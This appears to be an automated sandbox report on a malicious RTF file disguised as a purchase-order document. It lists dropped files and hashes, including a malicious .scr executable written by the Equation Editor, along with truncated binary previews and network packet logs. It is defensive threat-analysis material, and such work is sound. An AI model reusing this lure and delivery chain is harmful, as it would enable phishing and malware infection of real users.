Malicious:	false
Reputation:	low
Preview:	L..................F.... ...r...r...r...r....C..B...<<...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X8...user.8......QK.X.X8....&=....U...............A.l.b.u.s.....z.1......WC...Desktop.d......QK.X.WC...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.<<...X;. .ATTHAC~1.DOC..........WB..WB..........................A.T.T.H.A.C.H.E.D. .S.C.A.N.-.P...O. .S.P.E.C.I.F.I.C.A.T.I.O.N.S...0.0.9...2.4... .0.0.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\528110\Users.user\Desktop\ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc.H.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.T.T.H.A.C.H.E.D. .S.C.A.N.-.P...O. .S.P.E.C.I.F.I.C.A.T.I.O.N.S...0.0.9...2.4... .0.0.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Generic INItialization configuration [folders]
Category:	dropped
Size (bytes):	124
Entropy (8bit):	4.7930073029725015
Encrypted:	false
SSDEEP:	3:M14x7gTSJG9LBLXS2m4ghgTSJG9LBLXS2v:M+x7MSJSFChMSJSFl
MD5:	F4365DCB33163821E292273391E955E2
SHA1:	56857D8E6E172C48FA139262FEA7ADD7CEC7A7AE
SHA-256:	6B79EDF535382412A5D8D8E908A2F7B934AF15F2AC24CB55339FA8D17429C600
SHA-512:	ED0172835E4901A93284B8C312ED8B945B8E70FECC8F2043E50ACAE1A3AE061DA4F1634A35FF3D5B5C51A179EA8A9DC5DA7D32AC50E41317B3E7E888F5A19991
Malicious:	false
Reputation:	low
Preview:	[doc]..ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK=0..[folders]..ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
MD5:	89AFCB26CA4D4A770472A95DF4A52BA8
SHA1:	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
SHA-256:	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
SHA-512:	EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\AppData\Roaming\mpoom39002.scr

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	331264
Entropy (8bit):	7.627305719102204
Encrypted:	false
SSDEEP:	6144:rOj1a7g+3FrDC0X4mowIsa8IaG8VdKmR5gwJgbDjamdLW9tHQB:q07g+3lv4mowAMJJgbDjamdLWQ
MD5:	37383DB5D0AAF3A258780342654AE739
SHA1:	67C7CCFF56B2CE1C9ED11B18507557077CDC07D9
SHA-256:	69F201E15280F32573FFDAFDE0CF139DEADCB9FA7D56BFD733B67F795560FEA4
SHA-512:	93D2CFB22EC9F8CA3D0E75995753AF0143ABB700333F4D1FA2C89AF369ABA1EF84041B2AE41047D5DED9A328B4C5E59CAE81F3F23CC7ABDA323BD2DB8DBC74B0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............. ... ...@....@.. ....................................@.................................. ..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........................................................................(.......r...ps....}.....s....}....r..{.....o......{.....o.....V..{....o .....o!...&".(......(#........(&...~....(....o'...o(....#......J.~....t)...()...&&.(......"........0............{.....+...0..9.........{.....{....o.......{....o.......{....o....}..........z...........!4.......0..4.........{.....{....o.......{....o......{....o....&......z........./.......0..E..........i. ....(....r...po...

C:\Users\user\Desktop\~$THACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyxblgl0nGltlMWtVGXlcNOllln:vdsCkWtMe2G/LkXh/l
MD5:	89AFCB26CA4D4A770472A95DF4A52BA8
SHA1:	C3B3FEAEF38C3071AC81BC6A32242E6C39BEE9B5
SHA-256:	EF0F4A287E5375B5BFFAE39536E50FDAE97CD185C0F7892C7D25BD733E7D2F17
SHA-512:	EA44D55E57AEFA8D6F586F144CB982145384F681D0391C5AD8E616A67D77913152DB7B0F927E57CDA3D1ECEC3D343A1D6E060EAFF8E8FEDBE38394DFED8224CC
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type:	Rich Text Format data, version 1
Entropy (8bit):	3.1325400825369365
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	ATTHACHED SCAN-P.O SPECIFICATIONS.009.24. 001.doc
File size:	212'028 bytes
MD5:	d90ae35b86323a7495fbd0f89b74ad08
SHA1:	a913d6148cbfb3a5be68a34052a4d1ab7d9de989
SHA256:	88ad296056a6be66969f1e5ce6694398944804a39d8465b42e0af73c5af12cb0
SHA512:	54e720b166c2a2e780c973d4da1b93403e098526cea1ac11a49ef8915eeea7c97faa905b233905d86adb2a0ec7e02ea412eb31608b5634bdd3685f9f183a9e94
SSDEEP:	768:sfDwAbZSibMX9gRWjtwAbZSibMX9gRWjtwAbZSibMX9gRWjAFU+Gt8ygBa75ZtaM:OwAlRkwAlRkwAlRPU+G+Xa75ZcqT
TLSH:	B624792DC34B02598F620376AB175E5142BDBA7EF38552B1346C437933EEC39A1252BE
File Content Preview:	{\rtf1..{\*\2Gg1NgJmSXbTxemlqsiLDkQRN9no9PRoVU1qJYcyTiTnF1tamoZl18rPgWfFi7FlimUYuhO29AgIEYqEYYFwoniNFT5GnTI9ocVtp8XFcTflaGUxHeAdGlseBUTd4WXHxZReiuxs37oywAm38bkf04GTe9F8BJqQJ9jdE1YEcfXiyKaoHwMmiln9pymYnq8r2uma2XEZRdFlKkqUrERm2qMyrTVgY9KsGMzKnSuAhYLtfTRP2yN

File Icon


Icon Hash:	2764a3aaaeb7bdbf

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	0000789Ah								no

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 07:49:56.795392036 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:56.795474052 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:56.795552969 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:56.806135893 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:56.806162119 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.010586023 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.010796070 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.015976906 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.015988111 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.016307116 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.016351938 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.088438988 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.132141113 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432013988 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432171106 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432203054 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432379007 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432390928 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432437897 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432480097 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432532072 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432609081 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432661057 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432738066 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432791948 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432863951 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.432915926 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.432990074 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.433036089 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.433116913 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.433171988 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.433262110 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.433360100 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.433429003 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.433480978 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.433532000 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.433579922 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.437666893 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532226086 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532288074 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532295942 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532327890 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532330036 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532367945 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532376051 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532408953 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532422066 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532453060 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532455921 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532488108 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532764912 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532804012 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532816887 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532851934 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.532855034 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.532887936 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533216953 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533256054 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533258915 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533292055 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533293962 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533323050 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533613920 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533652067 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533654928 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533695936 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533739090 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533771038 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533782005 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533814907 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533817053 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533849001 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.533852100 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.533885956 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.534393072 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.534434080 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.534435987 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.534466028 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.633590937 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.633663893 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.633790970 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.633841038 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.633920908 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.633968115 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634053946 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634118080 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634201050 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634253025 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634344101 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634393930 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634466887 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634514093 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634604931 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634654045 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634727001 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634769917 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.634881020 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.634932041 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.635025978 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.635077000 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.635164022 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.635219097 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.635559082 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.635618925 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.635804892 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.635863066 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.636286974 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.636373997 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.636563063 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.636624098 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.637589931 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.637645960 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.637945890 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.638004065 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.638134003 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.638196945 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.638375044 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.638432026 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.638489962 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.638539076 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.735409021 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.735502005 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.735591888 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.735760927 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.735773087 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.735819101 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.735867977 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.735919952 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.736217022 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.736287117 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.736376047 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.736437082 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.737341881 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.737417936 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.737648964 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.737715960 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.737885952 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.737956047 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.738246918 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.738317966 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.738631964 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.738694906 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.738807917 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.738867998 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.739027977 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.739094019 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.739473104 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.739536047 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.739993095 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740056038 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.740149021 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740200043 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.740519047 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740581036 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.740659952 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740704060 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.740823030 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740880966 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.740942001 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.740993977 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.741529942 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.741595030 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.741736889 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.741800070 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.742397070 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.742475986 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.742656946 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.742726088 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.743184090 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.743249893 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.743388891 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.743449926 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.743686914 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.743757010 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.744041920 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.744148970 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.744307041 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.744371891 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.744679928 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.744740009 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.745429039 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.745448112 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.745501995 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.836749077 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.836942911 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.837934017 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.838012934 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.838085890 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.838141918 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.838541031 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.838615894 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.840291023 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.840365887 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.840471029 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.840533972 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.840627909 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.840677977 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.841244936 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.841319084 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.841336966 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.841384888 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.842679024 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.842753887 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.842772007 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.842823982 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.843786955 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.843854904 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.843877077 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.843919992 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.844084024 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.844151020 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.844608068 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.844679117 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.845371962 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.845484972 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.845901012 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.845972061 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.846826077 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.846882105 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.846893072 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.846899033 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.846927881 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.846935987 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.847085953 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.847145081 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.848206043 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.848267078 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.848269939 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.848304033 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:57.848323107 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.848342896 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.849652052 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.849901915 CEST	49161	443	192.168.2.22	172.67.134.136
Apr 23, 2024 07:49:57.849910021 CEST	443	49161	172.67.134.136	192.168.2.22
Apr 23, 2024 07:49:59.613476038 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:49:59.786726952 CEST	80	49162	193.122.6.168	192.168.2.22
Apr 23, 2024 07:49:59.786804914 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:49:59.788209915 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:49:59.961425066 CEST	80	49162	193.122.6.168	192.168.2.22
Apr 23, 2024 07:50:00.892457008 CEST	80	49162	193.122.6.168	192.168.2.22
Apr 23, 2024 07:50:01.187113047 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:51:05.884891987 CEST	80	49162	193.122.6.168	192.168.2.22
Apr 23, 2024 07:51:05.885220051 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:51:40.935224056 CEST	49162	80	192.168.2.22	193.122.6.168
Apr 23, 2024 07:51:41.108491898 CEST	80	49162	193.122.6.168	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 07:49:56.673778057 CEST	54562	53	192.168.2.22	8.8.8.8
Apr 23, 2024 07:49:56.782021999 CEST	53	54562	8.8.8.8	192.168.2.22
Apr 23, 2024 07:49:59.261459112 CEST	52917	53	192.168.2.22	8.8.8.8
Apr 23, 2024 07:49:59.352401972 CEST	53	52917	8.8.8.8	192.168.2.22
